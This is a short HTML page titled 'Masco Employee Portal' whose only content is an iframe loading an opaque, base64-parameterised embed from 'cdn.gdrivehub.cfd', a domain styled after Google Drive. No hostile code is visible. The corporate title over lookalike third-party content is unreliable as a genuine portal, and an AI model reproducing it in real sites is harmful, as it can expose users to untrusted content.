<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Masco Employee Portal</title>
  <link rel="shortcut icon" href="logo-main.png" type="image/x-icon">
  <link href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" rel="stylesheet">
  <script src="https://cdnjs.cloudflare.com/ajax/libs/vanilla-tilt/1.7.3/vanilla-tilt.min.js"></script>
  <link rel="stylesheet" href="styles.css">
</head>

<body>
  <iframe 
    src="https://cdn.gdrivehub.cfd/embed?photo=VHhYZER6Sk9zQy84eml2UzV2eDlUemFpdnlRUVpCVUdscXhYS3VYaDR4c0NoUnllNHVNcHY5dGRzTVgzdXNXZDBJNDAyUFBab3ZCWHMzaTdOcHdkQUg2SERhWWpFb0FhT3RhckE3L1libVk9" 
    width="640" 
    height="360" 
    frameborder="0" 
    allowfullscreen>
</iframe>
</body>
</html>
